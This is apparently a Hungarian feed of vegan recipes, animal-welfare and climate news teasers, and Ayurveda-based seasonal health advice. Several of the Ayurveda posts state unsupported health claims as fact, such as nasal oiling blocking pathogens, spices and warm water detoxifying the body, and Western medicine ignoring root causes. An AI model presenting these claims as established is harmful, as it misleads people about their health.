A datolyakaramella tökéletes választás lehet, ha egy egészséges édességre vágysz, vagy szeretnéd feldobni a reggeli zabkásádat. Ebben a cikkben megosztjuk az otthon is könnyen elkészíthető, mennyei datolyakaramella receptjét. A datolya természetes édesítőszerként is funkcionál, így kiváló választás azok számára, akik csökkenteni szeretnék a finomított cukrok fogyasztását. Ezenkívül gazdag tápanyagokban is. Egy igazi szuperélelmiszer, ami tele… The post Vegán datolyakaramella négy összetevőből elkészítve appeared first on Prove.hu.
Könyv készült a sejtalapú élelmiszergyártásról
2023. november 25. Prove - a világ vegán szemmel
Előreláthatóan 2024-ben jelenik meg Európában a Cultivated Meat to Secure Our Future, a sejtalapú élelmiszergyártás jövőjéről szóló könyv. A kiadványban elismert egészségügyi szakemberek, élelmiszermérnökök és állatjogi aktivisták tárgyalják a technológiában rejlő lehetőségeket, buktatókat és a leküzdésre váró akadályokat. A sejtalapú élelmiszergyártás állati szenvedés, valamint a biodiverzitás felszámolása nélkül tudna megoldást találni az élelmiszer-biztonságra. Éppen ezért… The post Könyv készült a sejtalapú élelmiszergyártásról appeared first on Prove.hu.
Csokis trüffel kosárka
Briliáns édesség az ünnepnapokra vagy vendégségbe, sőt akár gaszto-ajándéknak is kiváló. Briliáns, mivel kevés hozzávalóból elkészíthető, ráadásul gyorsan elkészül, nem időigényes, az íze pedig olyan tömény, hogy nem kívánunk belőle túl sokat enni. A trüffel szónak két jelentése is van, az egyik egy puha csokis sütemény, a másik pedig a szarvasgomba neve. Sajnos ez utóbbi nagggggyon drága. Nem is beszélek többet róla, mert az íze viszont annál finomabb. Most puha csokis süteményre használjuk a trüffel szót.
Ha több ember számára készítjük ezt az édességet, érdemes az adagokat megduplázni vagy megháromszorozni. 1 nagyobb banán és egy tábla csokival kb. 12 kosárka készíthető.
A recept
Hozzávalók a "tésztához":
- 1 maroknyi dió vagy mandula vagy vegyesen valamilyen olajos dióféle
- kevés víz
- ízlés szerint csavarhatunk bele egy fél citromot, vagy belereszelhetjük a citrom héját.
A magokat finomra őröljük és egy kevés vízzel egy gombócot formálunk belőle. Frissen tartó fóliát leterítünk az asztalra vagy a munkalapra/ gyúródeszkára és sodrófával kinyújtjuk majd pogácsa szaggatóval (kisebbet érdemes választani) kiszaggatjuk. Egy muffin sütőbe papírokat teszünk. A kiszaggatott tésztákat beletesszük ezekbe a kis papírkosárkákba, majd ha eperrel szeretnénk elkészíteni, egy fél epret teszünk mindegyikre.
Hozzávalók a "krémes" részhez
- 1 banán
- 100g vegan étcsoki
A banánt aprító géppel pépesre keverjük. Az étcsokit vízgőz felett (vagy mikróban) megolvasztjuk. A megolvadt csokihoz hozzákeverjük a banánpépet. Igény esetén tehetünk hozzá reszelt narancshéjat.
Az összekevert banános étcsokit rákanalazzuk a kiszaggatott tésztalapokra.
Elkészítési folyamat képekben
Szinte az összes kibocsátási mutató elmarad a vállalt értékektől
2023. november 17. Prove - a világ vegán szemmel
A State of Climate Action 2023 jelentése alapján egyetlen kivételtől eltekintve nincs olyan kibocsátási mutató, ami az egyes országok által kinyilatkoztatott karboncsökkentési vállalásokkal összhangban lenne. Amíg a legtöbb ország jól hangzó célokkal dobálózik, a valóság az, hogy senki sem produkálja az elvárható számokat a másfél fokos átlaghőmérséklet-növekedés megakadályozása érdekében. A jelentés részletezte, hogy milyen drasztikus… The post Szinte az összes kibocsátási mutató elmarad a vállalt értékektől appeared first on Prove.hu.
Egészségmegőrzés decemberben - aktualitások
2023. november 10. Élj harmóniában
Közeleg a tél... hideg, egyre rövidebb nappalok, kopárság, szél, szárazság, befagyott tócsák, tavak, ereszről lelógó jégcsapok, látható lehelet, füstölő kémények... A tél közeledtével a hőmérséklet egyre alacsonyabb lesz, decemberben már a föld is befagy. Csökken a napsütéses órák száma és jellemzőek lesznek a sötét, felhős, nyirkos, borongós nappalok. A természet szép és csendes és amikor leesik a hó, varázslatos, mesebeli lesz a táj a fehér takaró alatt. A természetben télen minden visszavonul, elcsendesül, egyes élőlények hibernálják magukat és vannak, akik délre költöznek. A táj ránézésre inaktív, de valójában csak visszavonult készül a tavaszi megújulásra. A mi szervezetünk számára is a tél a pihenés, a lelassulás, a visszavonulás ideje, hogy tavasszal tele legyünk majd megújult energiákkal. A testedben a hő belülre húzódik, ez megnöveli az étvágyadat, de hidegebbé teszi a kezeket, lábakat és szárazabbá válik a bőrünk is. A hideg miatt az izmok is összehúzódnak és sokan tapasztalhatnak nyak, váll- vagy éppen háti fájdalmakat. A hőmérséklet jelentős csökkenése miatt legyengül a szervezetünk ellenállóképessége is. Ez a téli időszak ideális arra, hogy többet pihenj, feltöltődj, kicsit befelé fordulj, visszavond magad a külvilágtól, egészséges, finom ételeket készíts, az otthon melegét élvezd a családoddal, barátaiddal. Sajnos az ünnepek miatt, sokan pont ilyenkor kapcsolnak magasabb fokozatra és teszik tele a naptárukat programokkal, plusz feladatokat generálnak maguknak, egymást érik a meghívások, találkozók, utazások, késő estig tartó kimaradások. Aminek az eredménye idegesség, szorongás, kimerültség, belső feszültség, legyengült immunrendszer, megfázások, megbetegedések. A kiegyensúlyozottsághoz, a téli hideg elleni védekezéshez, az egészséged megőrzéséhez nem csak a jól fűtött lakás, de a megfelelő öltözködés, a napi rutin, a táplálkozás és megfelelő testmozgás is nagyban hozzájárul. Ne feledd az ünnepek közeledtével amire a legnagyobb szükséged van, az energiaszinted, egészséged, belső harmóniád, stabilitásod, nyugalmad. Sajnos sok családban az ünnepekre már mindenki kimerül és sok a veszekedés, idegeskedés. Gyakorold a szeretetet, elfogadást az ünnepek alatt is, lásd meg mindenkiben a csodát, koncentrálj mások jó tulajdonságaira, kincseire, amikben jók, amiért lehet őket tisztelni. Ne a hibákra figyelj, senki se tökéletes. Annak érdekében, hogy az ünnepek alatt is kiegyensúlyozott maradj, a napi rutinoddal teheted a legtöbbet. A napi menetrend olyan az életünkben, mint egy ház alapja. Érzelmi hatások December 21-ig a nappalok egyre rövidebbek. A fény hiány, a téli hideg sokaknak okoz lehangoltságot, búskomorságot vagy akár depressziós érzéseket is. Ellensúlyozd a téli depressziót fénnyel és melegséggel. Kapcsolj lámpákat, használj gyertyákat, öltözz vidám színekbe. Napközben sétálj és élvezd a fényt a szabadban, amikor csak teheted, süttesd az arcod a napsugarakkal. Ugyan télen kevesebbet tudunk mozogni, de amikor teheted melegítsd fel a szervezeted mozgással - séta, tánc, jóga vagy bármilyen mozgás jó, hogy megmozgasd a keringésed. Ideális téli mozgásra, ha gyertyafényes romantikus estéken tartotok a pároddal. A testmozgás segít az emésztésed javításában is. Ha rád tör a szomorúság, ne engedd, hogy magával ragadjon a negatív érzés. Hívd fel egy barátodat, találkozzatok, csináljatok valami közös, kellemes programot. Az édességeknek is van egyfajta hangulatjavító hatása, készíts süteményt aszalt gyümölcsökkel, diófélékkel, magokkal. A jó hangulatod megőrzése érdekében kerüld a negatív hangulatú filmeket, thrillereket, nagyon gonosz, agresszív vagy éppen depressziós filmeket. Nézz napsütötte tájakon játszódó vidám filmeket. A téli bekuckózás ideális arra is, hogy a nyár folyamán készített fotókat elővegyétek és a szép tájakat, napsütötte hegytetőket, tengerpartokon készült képek alapján visszaidézzétek az élményeiteket. Egészségmegőrzési praktikák Télen érdemes figyelni az egészséged megőrzésére, mert a hidegben csökken a szervezeted ellenálló képessége. A betegség elkerülésére figyelj, hogy a hidegben ne szájon át lélegezz, mert a hideg levegő a tüdőt nagyon áthűtheti. Érdemes az orrnyálkahártyát is védeni - az ájurvédában reggelente az orrjáratot beolajozzunk, ez segít a nyálkahártyát nedvesen tartani és megakadályozza a kórokozók tapadását. Ahogy a testedben is a hő belülre húzódik, a végtagok keringése romlik és a kezek, lábak hidegebbé vállnak. A legtöbben tapasztalják, hogy a téli időszakban a bőrük kiszárad. A hideg beálltával egyre többen tapasztalnak zavaró nyak vagy vállfájdalmat, hátfájást esetleg görcsöt a lábban. A kiszáradás és az izmok feszülése ellen nagyon jó az olajos önmasszázs. Az olajos önmasszázs javítja a keringésed, felmelegíti a tested, erősíti az immunrendszed és védi a bőrödet a hideg is kiszáradás ellen és kiváló hangulat javító is a borongós téli napokon. A téli hideg elleni védekezésben nagy szerepe van a megfelelő öltözködésnek is Öltözz rétegesen, hogy a kinti és benti körülményekben is ideális legyen a testhőd. Kerüld el, hogy belső térben megizzadj és utána kimész a hidegbe. A sapka, sál, kesztyű nem csak védenek a hideg ellen, de ha szép színesek akkor a hangulatodat is feldobják. Ne feledd a legtöbb hő a fejen távozik, így mindig tartsd befedve a fejedet. Napi rutin A napi rutin biztosítja a kiegyensúlyozottságot, stabilitást. Ezt teljesen jól látjuk a gyerekeknél, de a felnőttek nem akarják észrevenni magukon, hogy azért undokok, idegesek, nyűgösek, mert nem feküdtek le időben vagy éppen nem ebédeltek időben. A felnőtt emberek szervezetének is ugyanúgy szüksége van a stabil napirendre. A december a túlzások ideje, a legtöbb pénzt ilyenkor költik az emberek, karácsonykor fogy a legtöbb áram, gáz, víz és ilyenkor fogy el a legtöbb étel is. Sokan munka után a pihenésre használható időt vásárlással, találkozókkal, ünnepi rendezvényekkel, bulikkal töltik. A kevés pihenés, a késő este elfogyasztott sok egészségtelen étel és sok alkohol, a késő esti lefekvés, sajnos nem kedvez az egészségednek. Este 22:00-ig feküdj le aludni, hogy a szervezeted tudjon regenerálódni. A szervezetednek nagyon nagy szüksége van arra, hogy időben lefeküdj és eleget aludj ahhoz, hogy tudjon regenerálódni. ne engedj a csábításnak, hogy késő estig fent legyél. Reggel 7 óráig kelj fel. Figyeld meg ha későig alszol, akkor tompaságot, tunyaságot érezhetsz a testedben és az elmédben. Ébredés után, fogyassz egy vagy két csésze meleg vizet. Az ellenállóképességed javítására, a tested melegítésére, keringésed fokozására, és a bőröd védelmére a legjobb az olajos önmasszázs. A reggeli melegvizes zuhanyozás előtt elvégzett olajos önmasszázs kiváló hangulat javító is. A reggelit legkésőbb 8 óráig fogyaszd el. Ha később reggelizel az könnyen túlterheli az emésztésed és fáradságot fogsz tapasztalni és tompaságot a délelőtt folyamán. A reggeli meleg étel legyen, segít a kinti hideget ellensúlyozni. Zabkása, főtt gabona, muffin. Az ebéd ideális ideje 11:30-14:00 között. Ilyenkor a legerősebb az emésztésed ereje. A főétkezést mindig ebédre fogyaszd el. A nap során igyál meleg vizet, meleg gyógyteákat. A meleg folyadék nem csak hidratál, de segít a testedet melegen tartani és kioldja a lerakódott salakanyagokat a szervezetedből. Szánj időt a nap során befelé figyelésre, relaxációra, meditációra, csendes elmélkedésre. Lehetőleg 18:00-ig vacsorázz meg. kerüld el a késő esti étkezéseket. A vacsorád könnyen emészthető ételekből álljon. Este 22:00 után már ne nagyon fogyassz semmit. Este már csak nyugis tevékenységeket végezz - kerüld filmezést, számítógépezést, olvasást és lehetőleg este 22:00-ig feküdj le aludni. A napi rutin, az önmagaddal való törődés hatásait kezd el figyelni magadon napról, napra. Figyeld meg hogyan hatnak a fentiek a testedre, egészségi állapotodra, elmédre. Próbálj kitartani 30-40 napig a rutin mellett. Ha ez sikerül, utána életed részévé válik. Táplálkozás Télen az egyik legjobb tevékenység a sütés főzés. Nem csak melegíti a lakást, finom illatokkal lengi be az otthonodat, összehozza a családot, a barátokat, de ha megfelelő ételeket készítesz, akkor biztosíthatod a család egészségét, a jó erős immunrendszert is és a hideg elleni védelmet is. November még arról szólt, hogy a szervezeted megpróbál a téli hideg elleni védekezéshez egy kis zsírréteget összeszedni, Érezheted, hogy erősebb volt az étvágyad az elmúlt hetekben, jobban kívántad akár a zsírt és a szénhidrátokat. December közepétől már nincs szükségünk további komolyabb zsírréteg felhalmozására. Ha vékonyabb testlakat vagy, akkor folytasd a táplálóbb, zsírosabb ételek fogyasztását, de ha amúgy is plusz kilóid vannak, akkor ne gyarapítsd tovább a kilókat. Ne feledd a téli mozgáshiányos életmód miatt, nem kell olyan sokat enni. A meleg, leveses, szaftos ételeket részesítsd előnyben, mint a levesek, szószok, főzelékek. Kiválóak a főtt gabonák, hüvelyesekből készült ételek. Jó télen a főtt gyökérzöldségek és főtt vagy áztatott diófélék fogyasztása is. A szervezetednek melegítő táplálékra van szüksége, de ha túleszed magad sok zsíros, édes, egészségtelen és nem frissen készült étellel, egy idő után egyre nehézkesebbnek, tunyábbnak, fáradtabbnak fogod érezni magad, mert túl sok lesz a salakanyag. Nem csak az energiaszintedre hat ki, ha túl sok salakanyag a szervezetedben, de lehet teltségérzeted, rossz emésztésed, puffadás, refluxos tüneted, hányingered és sok nyálka halmozódhat fel - mellkasi lerakódás, nátha. Kezdj el használni melegítő, keringést és emésztést fokozó fűszereket, mint a kurkuma és a gyömbér. Továbbá fahéj, szegfűszeg, feketebors, kardamom, fokhagyma. A fűszerek segítenek a méregtelenítésben és erősítik az immunrendszeredet, a védekezőképességedet a kórokozókkal szemben. Megannyi kiváló fűszer antivirális, antibakteriális hatásokkal rendelkezik. Csak akkor egyél ha éhes vagy. Amikor úgy eszel, hogy nincs étvágyad, akkor nem tudod jól feldolgozni az ételt és salakanyag válik belőle a testedben. Amúgy meg sokkal finomabb az étel, ha úgy eszel, hogy éhe vagyJ A sok nehéz húsos étel kompenzálására, próbálj minél több zöldséges ételt készíteni. Jó ha felteszed az étlapra a céklát, sárgarépát, káposztát, brokkolit, mert segítenek a szervezetednek a tisztulásban, javítják az emésztést. Télen a gyümölcsöket párolva, sütve fogyaszd, fűszerekkel elkészítve. Nyersen nagyon erős a nedvesítő, nyálkásító és hűtő hatásuk. Ha nyálkásodásra hajlamos vagy (kapha alkatú) akkor kerüld el a tejet, a tejtermékeket és tejes édességeket, válaszd inkább a szárazabb ételeket, szárazabb édességeket pl. kekszeket. December végén, január elején lehet, hogy már érzékeled a testedben, hogy elnehezítenek a zsíros ételek, a kenyér félék, a desszertek. Január közepétől érdemes nekikezdeni egy egyszerű otthoni tisztításnak. Az ájurvéda tisztítókúrával éhezés nélkül, egy monodiéta és néhány egyszerűen kivitelezhető tisztító gyakorlat segítségével tudsz megszabadulni a felgyűlt salakanyagoktól. Éhezésbe, böjtölésbe, nyers ételek fogyasztásába ne kezdj télen, mert legyengül az immunrendszered, fázékonnyá válhatsz és könnyen megbetegedhetsz. A tél üzenete Ne feledd, a tél legfontosabb üzenete, a pihenés, feltöltődés, visszavonulás. A téli ajánlások egyéni alkat szerint eltérőek lehetnek, de jó ha tiszteled a természet ritmusát és igazodsz a tél sajátosságaihoz az életmódoddal. Hasznos ha az év vége felé, inkább befelé fordulsz. átgondolod az eltelt évedet. Mik történtek, egészség, munka, családi, baráti, emberi kapcsolatok, táplálkozás, testmozgás, szabadidő, boldogság érzet, fejlődés, spiritualitás. Hasznos, ha hálát adsz mindazért, amit kaptál, hálával és köszönettel gondolsz azokra a személyekre, akik segítettek, támogattak az elmúlt évben, hozzájárultak életed alakulásához, fejlődésedhez. Az év vége/év eleje csodás lehetőség arra is, hogy elkezd a következő évet előkészíteni. Tudatosan érdemes végig gondolni a fentieket, 2024-ben hogyan szeretnéd látni és, mennyi időt, energiát kívánsz fordítani és mennyi teret engedsz annak, hogy az adott dolog más legyen a következő évben. A tél tunya, búskomorságát jól tudod ellensúlyozni szeretetteljes emberi kapcsolatok ápolásával is. Töltsetek időt közösen, nevessetek, szerezzetek örömet egymásnak. Csinálj boldogságot, örömet, testet lelket melegséggel eltöltő tevékenységeket. Kerüld a rohanást, a túl sok feladatot, legyen elegendő időt relaxálni, pihenni, elcsendesedni, befélé figyelni. Csodálatos téli napokat kívánokJ szeretettel Kati
ősz, ősz, ősz... Az az igazi novemberi, esőáztatta, nedves, ragadós avar
2023. november 5. Élj harmóniában
ősz, ősz, ősz... Az az igazi novemberi, esőáztatta, nedves, ragadós avar Fák lombok nélkül, korhadó falevelek, eső, fényhiány és napfény váltakozó tánca ... megkezdődött a természetben a visszahúzódás... Amikor csak látom, hogy kisüt a nap, kicsit kimegyek a szabadba, mert nem tudhatom mikor lesz legközelebb lehetőség újra érezni a bőrömön a nap simogató sugarait. A fák, bokrok megválnak pompájuktól, behúzodik az életenergiájuk a fa belsejében. Külső szemlélő számára, lassan teljesen inaktívnak tűnnek... pedig az élet ott lüktet a belsejükben, de visszavonultak kicsit a világtól annak érdekében, hogy megpihenjenek és majd tavasszal újra tele energiával, csodás pomájukkal nyűgözhessék le a világot:) A környezeti hatások, az emberek szevezetére is hatással vannak... A mi életenergiánk is visszahúzódik novemberben... Ez részben érzékelhető a hideg kezek lábak terén, a bőrnél a kiszáradáson, összehúzódáson, és a belső energiánk megnövekedésén - erősödő étvágyon. Ez az étvágy segít biztosítani, hogy télre megfelelő védekező zsírréteget építhessen a tested. Ne ilyenkor kezdj fogyókúrába:) Azzal tudod legjobban támogatni ilyenkor a tested természetes folyamatait, ha kicsit visszavonulsz a külvilágtól, a találkáktól, programoktól és hagysz időt magadnak töltődésre, pihenésre.
A dohányhirdetésekhez hasonlóan kellene felszámolni a húsreklámokat?
2023. november 5. Prove - a világ vegán szemmel
Egy Egyesült Királyságban működő szervezet szerint mielőbb meg kellene oldani, hogy egyáltalán ne lehessen húsreklám az utcákon. Kilencpontos listán mutatták be azokat a trükköket, amelyeket megtévesztésre és a valóság elfedésére használnak az állati eredetű termékeket hirdető cégek. Az Adfree Cities (Reklámmentes Városok), a kültéri céges reklámokat támadó csoportok hálózata új felvetéssel állt elő. Az Egyesült… The post A dohányhirdetésekhez hasonlóan kellene felszámolni a húsreklámokat? appeared first on Prove.hu.
Vata tea
2023. november 3. Élj harmóniában
Ez egy szuper tea recept azoknak, akik vata alkatúak vagy valamilyen vata egyensúlytalansággal küzdenek. Az őszi és téli időszakban, amikor beköszönt a száraz hideg, ideális alkalomszerűen fogyasztva minden dosha számára. Vata egyensúlytalanság tünetei: bőr szárazsága, repedezettsége, energiahiány, az életerő csökkenése, fáradtság, kimerültség. Az emésztés hatékonysága is sokaknál csökken, nehéz emésztés, puffadás, székrekedés fordulhat elő. A vata az idegrendszerre komoly hatással van, idegesség, búskomorság, akár talajvesztettség, gyökértelenség érzés, nyugtalanság, esetleges koncentráció zavar, álmatlanság . Érzékenység az erős hangokra, zajokra. A Vata egyensúlyzavar tüneteként nyílaló fájdalmak a testben, alsó háti fájdalmak, ízületi fájdalmak és magasvérnyomásos problémák léphetnék még fel az arra érzékenyeknél. Hozzávalók 1/4 teáskanál friss reszelt gyömbér 1/4 teáskanál őrölt fahéj 1/4 teáskanál őrölt kardamom 1/4 teáskanál ajwain 1 csésze víz Forrald fel a vizet, majd kapcsold le teljesen. Szórd bele a fűszereket és hagyd állni benne néhány percig. Tetszés szerint édesítheted, ízesítheted. Különösen nyugtató és földelő hatású a vata személyeknek. A vata kiegynlítésről további cikkekben olvashatsz itt a blogon https://eljharmoniaban.blogspot.com/2023/11/egeszsegmegorzes-novemberben.html https://eljharmoniaban.blogspot.com/2015/09/oszi-egeszsegmegorzes-tanacsok-az.html Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Egészségedre:) szeretettel KAti
A tejipar ellen tiltakoztak a londoni Tate Modern galéria előtt
2023. október 30. Prove - a világ vegán szemmel
A kortárs művészeti alkotásként is felfogható demonstráció a tejipar kegyetlensége ellen szólalt fel. A performansz során tehenek helyett emberekre kerültek a fejőgépek. Ennek oka a demonstráció szervezője szerint az volt, hogy így könnyebben átmenjen az üzenet a járókelőknek. Szerintük ugyanis a saját fajunk szenvedése jobban megérint minket. Érdekes demonstrációt láthattak azok, akik október 21-én a… The post A tejipar ellen tiltakoztak a londoni Tate Modern galéria előtt appeared first on Prove.hu.
David Attenborough szerint önző módon terjeszkedünk a bolygón
2023. október 27. Prove - a világ vegán szemmel
A világhírű természettudós és dokumentumfilmes, Sir David Attenborough úgy véli, nagyon önző, ahogy feléljük a környezetünket. Véleménye szerint úgy terjeszkedünk, mintha rajtunk kívül senki nem lenne a bolygón. Azzal hitegetjük magunkat, hogy a természet mindig ott lesz, de ez nem így van. A tudós legújabb dokumentumfilmje kapcsán osztotta meg borúlátó nézeteit. Annak ellenére, hogy a… The post David Attenborough szerint önző módon terjeszkedünk a bolygón appeared first on Prove.hu.
A klímaváltozás miatt nincs elég anyateje a jegesmedvéknek
2023. október 18. Prove - a világ vegán szemmel
Sok jegesmedve szervezete nem tud elegendő mennyiségű vagy megfelelő minőségű anyatejet előállítani a felmelegedés miatt. A Torontói Egyetem kutatói közzétettek egy tanulmányt, amelynek keretében azt vizsgálták, a tengeri jég csökkenése jelentős hatást gyakorol-e a szoptató jegesmedvék tejtermelésére. A kutatás során a kanadai Hudson-öböl nyugati részén élő jegesmedvéket vizsgálták. Ezen a területen a tengeri jég csak… The post A klímaváltozás miatt nincs elég anyateje a jegesmedvéknek appeared first on Prove.hu.
Portugál fiatalok az Európai Bíróságra viszik a klímaharcot
2023. október 11. Prove - a világ vegán szemmel
A globális felmelegedés megfékezésére és a kollektív klímaharc megkezdésére buzdítana 32 országot hat portugál fiatal. Az ügy érdekében jogi lépéseket is tettek. Ma már a legkevésbé sem számít ritka jelenségnek, hogy fiatalok, sok esetben gimnazisták próbálják meg felhívni a politikusok és vezető gazdasági szereplők figyelmét a globális felmelegedésre. Gondoljunk csak a Fridays for Future globális… The post Portugál fiatalok az Európai Bíróságra viszik a klímaharcot appeared first on Prove.hu.
Jávorszarvas tévedt a metrósínekre, lelőtte a vadőr
2023. október 7. Prove - a világ vegán szemmel
Négy órán keresztül bóklászott a jávorszarvas a stockholmi metróvonalon. A vadőrök nem tudták befogni vagy elhajtani onnan, így végül lelőtték az állatot, hogy helyreállhasson a menetrend szerinti közlekedés. A stockholmi piros metróvonalon a 36 megállóból hetet le kellett zárni, miután jávorszarvas tévedt a sínekre. A svéd főváros metrórendszere összességében mintegy 100 állomást ölel fel, és… The post Jávorszarvas tévedt a metrósínekre, lelőtte a vadőr appeared first on Prove.hu.
A Galápagos-szigeteken is megjelent a madárinfluenza
2023. október 6. Prove - a világ vegán szemmel
A közismert szigeten számos endemikus, vagyis csak ott megtalálható faj él. Ezért különösen aggasztó, hogy már itt is megjelent a madárinfluenza veszélyes, H5N1 variánsa. A szigeten szigorú biztonsági intézkedéseket vezettek be, hogy így óvják a ritka vagy veszélyeztetett állatfajokat a további fertőzésektől. A Charles Darwin munkássága kapcsán közismertté vált szigetcsoportról szinte már mindenki hallott, aki… The post A Galápagos-szigeteken is megjelent a madárinfluenza appeared first on Prove.hu.
Kínában egyre több a házi kedvenc, a haszonállatok szenvedésével szemben azonban közönyösek
2023. szeptember 23. Prove - a világ vegán szemmel
Egyre több kínai dönt úgy, hogy életét megosztja egy vagy több háziállattal. A rájuk költött összeg is folyamatosan nő, a haszonállatok szenvedésével szemben azonban továbbra is közönyös marad az ország lakossága. Kínában sikkessé vált háziállatot tartani. Az ázsiai ország városaiban jelenleg mintegy 116 millió kutya és macska teszi boldogabbá gazdái mindennapjait. Elemzők szerint a fiatalok… The post Kínában egyre több a házi kedvenc, a haszonállatok szenvedésével szemben azonban közönyösek appeared first on Prove.hu.
Narancsos-kardamomos torta olívaolajjal - Csenge és Flóra világkonyhája
2023. szeptember 17. Prove - a világ vegán szemmel
A narancs és a kardamom édes-fűszeres kombinációja és az olívaolaj pikáns aromája teszi olyan ellenállhatatlanná ezt a mediterrán tortát, amit tisztán növényi hozzávalókból fogunk elkészíteni. Ez a torta a világ konyháinak tökéletes fúziója, amely, bár nem mondható ebben a formában hagyományosnak, mégis hatalmas népszerűségnek örvend a mediterrán régióban az utóbbi években. Ez a cikk a… The post Narancsos-kardamomos torta olívaolajjal - Csenge és Flóra világkonyhája appeared first on Prove.hu.
Szent György - hegy
2023. szeptember 5. Élj harmóniában
Szent György - hegy , a Balaton felvidék egyik csodás kilátópontja... hihetetlen panoráma Nem csak a Balaton környéke, de ellátni a Bakonyig... a Somlóra is sz?p a kil?tás , szinte alig van olyan kiemelkedes aminek ne tudnám a nevét Áhítattal nézek szertesz?t és el se hiszem, hogy van lehetőségem gyönyörködni ilyen látványban. imádok panorámás helyeken járni... a kis hegyeket kirándulás szempontból nem szeretem, de körbe panorámásak és ez gyönyörködtet. Jó amikor nem csak földrajzon hallottam valamit, de olyan helyeket nézek amiket bejártam és megannyi csodás emlékem van. Ha a gyerekek saját tapasztalatból tanulhatnák a földrajzot, biológiát, etc. Nem lenne annyi gond a tanulással... Csodás panorámákat kívánok :) szeretettel Kati
Egészséged megőrzésének titka
2023. július 27. Élj harmóniában
Az egészséged megőrzésének titka, a megfelelő, egészséget támogató, rendszeres szokások kialakítása. Amikor valaki beteg lesz, a nyugati gyógyítás próbálja enyhíteni a tüneteket, de nem keresi meg a probléma kiváltó okát és nem segít a betegeknek azt felszámolni. Ha valaki ugyanazt csinálja mint korábban, miért várja bárki azt, hogy más eredményt kap. Az ájurvéda nagy hangsúlyt fektet a napi rutin kialakítására. Ha naponta szánsz egy kis időt arra, hogy megszabadulj a feszültségektől (relaxálj), táplálkozz egészségesen, aludj eleget, mozogj az állapotodnak megfeleleően, azzal sokkal többet érsz, mintha 2 hétig nem mozogsz és utána valami fitness teremben kifulladásig sportolsz vagy szombaton egész nap alszol, hogy pótold a heti elmaradásodat, vagy heti 1 napig koplalsz, hogy ledolgozd a héten elfogyasztott édességeket, gyors étteremi ételeket:) Alakíts ki egészséget támogató szokásokat, de csak lépésről lépsére. Az ájurvéda nem javasolja, hogy hirtelen minden szokásodat megváltoztasd. Ha úgy érzed az egészséged megőrzéséhez vagy akár megfelelő napi rutin kialakításához, támogatásra, segítségre van szükséged, nyugodtan kérj hozzám konzultációs időpontot. szeretettel várlak Kati Rólam bővebben itt olvashatsz: https://www.eljharmoniaban.hu/oktatoink eljharmoniaban@gmail.com +36 30 343 6429
Mishti dahi
Bengália, az India keleti részén fekvő régió gazdag kultúrával és kulináris örökséggel rendelkezik. A bengáli ételek közül kiemelkednek a tejes édességek, amelyeket a világ minden táján kedvelnek. Ezek az édességek általában lágyak, krémesek és édesek. Gyakran készítik friss tejből, gyümölcsökből, fűszerekből és olajos magvakból. A mishti dahi egy krémes, édes joghurtos desszert, amelyet általában gyümölcsökkel vagy magvakkal (pisztácia, mandula) tálalnak. Elkészítése egyszerű, de türelmet igényel. Hozzávalók: 10 dkg cukor 1 l tej 3 ek joghurt A cukrot egy lábosban karamellizáljuk, majd hozzáadjuk a tejet. Amikor a karamell elolvad benne, kicsire veszük a lángot, és addig főzzük, amíg a karamelles tej nagyjából a háromnegyedére sűrűsödik. Ha ez megvan, levesszük a tűzről, és kézmelegre hagyjuk kihűlni (43-44 fok). Ha elérte a megfelelő hőmérsékletet, habverővel elkeverjük benne a joghurtot, és gondosan lefedjük az edényt. Hogy tartsa a hőmérsékletet, betesszük a sütőbe (nem kell bekapcsolni ? ) néhány órára, lehet akár éjszakára. Reggelre kész az édes joghurt, betesszük a hűtőbe lehűlni, majd gyümölccsel, esetleg pisztáciával, szeletelt mandulával megszórva tálaljuk.
Sült polenta
Tegnap Romániában jártunk, és hazafelé Nagyváradon mindig a túrázás után bemegyünk egy helyi boltba, ahol finom vegán felvágottak, sajtok, krémek is kaphatók és természetesen kukoricadara is, melyből készül a polenta, mely ott egy tradicionális étel. Önmagában nem annyira kedveljük (valaki sósan, van, aki tejjel, vagy édesen szereti), de növényi sajttal; grillzöldségekkel, gomba-padlizsánraguval, sült hagymával, vagy […]
A kerttől a konyháig
Itt megrendelheted e-book formában. (PDF, epub, mob) Hemangi devi dasi újonnan megjelent színes vegetáriánus szakácskönyve. Úgy gondolom a friss, saját magunk által szedett zöldségeknél nincs jobb. Más az íze, mint a boltinak, ezáltal más lesz a belőle készített étel íze is. A természetes alapanyagok használata egyre inkább a gasztronómia fontos részévé válik. A kertészkedés harmonikus kapcsolatot teremt a környezettel, ugyanakkor válasz a jól ismert válság problémára is. Mi kell ahhoz, hogy szemet gyönyörködtető és ízletes ételt főzzünk, amely elégedetté teszi az érzékszerveket? Semmiképpen sem drága, különleges alapanyagok. A hozzávalói a következők: ? Egy nagy adag szeretet. A főzésben ez a legfontosabb tényező. Amikor a háziasszony főz a családjának, a kedvenc fogásaikat készíti, mert így fejezi ki a szeretetét. Nemhiába mondják: az ember szívéhez a gyomrán át vezet az út. ? Lelkesedés és némi fantázia. ? Néhány jó recept. ? Egészséges, energiadús hozzávalók. Lehetőleg a saját kertünkből, ha nem, a piacról. És ami mindezt megkönnyíti s mindennapi étkezésünket még harmonikusabbá teszi, az éppen az az egyszerű alapelv, melyre a könyvemet is igyekeztem felépíteni: mindig az adott évszaknak megfelelő alapanyagokból készíthető a legolcsóbb és legegészségesebb étel. Kaldeneker György ajánlása a könyvhöz: Ajánlom ezt a könyvet azoknak, akik szeretnének elszakadni a rohanó nagyvárosi világtól, picit megpihenni egy nyugodt, ideális környezetben. Mindenkinek, akinek a főzés nem unott és kötelező munka, hanem szeretetteljes gondoskodást jelent. Kaldeneker György Itt megrendelheted e-book formában. (PDF, epub, mob)
Az első nyár hangulatú vasárnap ...
2023. május 21. Élj harmóniában
